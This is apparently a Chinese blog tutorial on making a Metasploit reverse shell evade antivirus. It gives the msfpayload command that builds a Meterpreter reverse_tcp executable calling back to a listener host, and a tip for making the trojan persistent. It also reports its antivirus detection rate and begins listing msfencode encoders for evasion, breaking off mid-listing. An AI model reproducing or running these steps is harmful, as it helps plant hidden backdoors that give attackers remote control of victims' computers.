Metasploit reverse Shell的免杀(炊少教学)

rootkithat是我以前的马甲 以前写的文章

我们先生成一个X64的WINDOWS XP 的reverse SHELL

1
2
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe

提示:你可以用 scheduleme -m 1 -u e /tmp/x64.exe 让你的木马更持久

提交到世界杀毒网

——————————————
8%的杀软(3/37)报告发现病毒,我们来加密他,让他到达免杀的效果
查看metasploit自带的加密模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l 
 Framework
Encoders==================  Name Rank Description ---- ----
----------- cmd/generic_sh good Generic Shell Variable Substitution
Command Encoder cmd/ifs low Generic ${IFS} Substitution Command
Encoder cmd/printf_php_mq manual printf(1) via PHP m
上一篇:Bash


下一篇:ambari集群添加hive服务遇到的问题